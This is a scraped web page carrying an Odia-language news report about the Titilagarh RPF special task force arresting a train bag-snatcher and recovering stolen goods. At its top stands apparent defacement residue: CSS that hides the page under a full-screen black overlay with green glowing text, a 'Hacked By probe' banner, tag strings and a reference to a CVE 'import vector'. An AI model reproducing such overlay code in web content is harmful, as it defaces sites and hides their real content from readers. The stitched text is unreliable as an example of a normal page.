html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMP4RL9UXPK
`58; Hacked By probe `68;
[ HXIMP4rl9uxpk ]
HXIMP4rl9uxpk
CVE-2026-49049 | import vector

ଟ୍ରେନ୍ ଲୁଟେରା କୁ କାବୁ କଲା ଆରପିଏଫ  ସ୍ପେଶାଲ ଟାସ୍କ ଫୋର୍ସ । 

User Rating: 4 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Inactive
 

ଲୁଟ ସାମଗ୍ରୀ ଉଦ୍ଧାର କଳା ଏସଟିଏଫ୍। 

ଟିଟିଲାଗଡ ( ଗୌରବ ଦର୍ଜୀ )-ଟ୍ରେନ୍ ଲୁଟେରା କୁ କାବୁ କରିଛି ଟିଟିଲାଗଡ ଆରପିଏଫ ସ୍ପେଶାଲ୍ ଟାସ୍କ ଫୋର୍ସ । ଆଜମେର - ପୁରୀ ସୂପରଫାଷ୍ଟ ଟ୍ରେନ ରେ ଜଣେ ମହିଳା ତାଙ୍କ ବାପା - ମା ଓ ଛୁଆ ସହ  ମାର୍ଚ୍ଚ ୨୪ ତାରିଖ ରେ  ସୁରଟ ରୁ ଭୁବନେଶ୍ୱର ଯାଉଥିବା ସମୟ ରେ ଖରୀଆର ରୋଡ ଷ୍ଟେସନ ପହଞ୍ଚିବା ପୂର୍ବରୁ ଜଣେ ଚୋର ତାଙ୍କ ଧରିଥିବା ଭ୍ୟାନିଟି ବ୍ୟାଗ୍ କୁ ଲୁଟି ନେଇ ଫେରାର ମାରିଥିଲା। ମହିଳା ଜଣକ ଗୁଜରାଟ  ର ଦୀପ୍ତି ଗାନ୍ଧୀ ବୋଲି ଜଣାପଡିଥିଲା। ମହିଳା ଭୁବନେଶ୍ୱର ରେଳଷ୍ଟେସନ ରେ  ପହଞ୍ଚିବା ପରେ ଜିଆରପି ପୋଲିସ ନିକଟରେ ଅଭିଯୋଗ କରିଥିଲେ। ମାର୍ଚ୍ଚ ୨୬ ରେ ମହିଳାଙ୍କ ମାମଲା ରୁଜ୍ଜୁ ହେବା ପରେ   ଏପ୍ରିଲ ୧ ତାରିଖ ରେ ଭୁବନେଶ୍ୱର ରୁ ଟିଟିଲାଗଡ ଜିଆରପି କୁ ମାମଲା  ସ୍ଥାନାନ୍ତର କରାଯାଇଥିଲା। ଟିଟିଲାଗଡ ଆରପିଏଫ ର ସ୍ପେସିଆଲ ଟାସ୍କ ଫୋର୍ସ ଓ କଣ୍ଟାବାଞ୍ଜି ଜିଆରପି ପୋଲିସ ର ମିଳିତ ଛାନଭିନ ରେ ଅଜ୍ଞାତ ଚୋର ଟି ମହାସମୁନ୍ଦ ର ସୌରଭ ବୁରାଣ୍ଡି ବୋଲି ଜଣା ପଡ଼ିବା ପରେ ଟିଟିଲାଗଡ ଆରପିଏଫ ର ସ୍ପେସିଆଲ ଟାସ୍କ ଟିମ୍ ର ଉପ ନିରୀକ୍ଷକ ଏମ.କେ ସାହୁ , ଆରକ୍ଷକ ଏସ ବିସବାଳ, ଆରକ୍ଷକ ଶମ୍ଭୁ ସାହୁ, ଆରକ୍ଷକ ସତିଶ କୁମାର, କଣ୍ଟାବାଞ୍ଜି ଜିଆରପି ପୋଲିସ ଏସ ଆଇ ମୋହନ ନାଏକ ଓ ତାଙ୍କ ସାଥୀ ଙ୍କ ମିଳିତ ଉଦ୍ୟମ ରେ ଏପ୍ରିଲ ୨ ତାରିଖ ଦିନ ମହାସମୁନ୍ଦ ଜିଲ୍ଲା ନୟାପଡ଼ା  ରେ ରେଡ୍ କରି ଆରୋପି ସୌରଭ ବୁରାଣ୍ଡୀ କୁ ଆରେଷ୍ଟ କରିବା  ସହ ଚୋରି ହୋଇଥିବା ଦୁଇଟି ମୋବାଇଲ , ନଅ ହଜାର ଟଙ୍କା, ସୁନା ଗହଣା, ତିନୋଟି ଏଟିଏମ କାର୍ଡ ଜବତ କରିଛନ୍ତି।  ସୌରଭ କୁ ଏପ୍ରିଲ ୩ ତାରିଖରେ କୋର୍ଟ ଚାଲାଣ କରିଛି ଟିଟିଲାଗଡ ଜିଆରପି ପୋଲିସ।

0
0
0
s2sdefault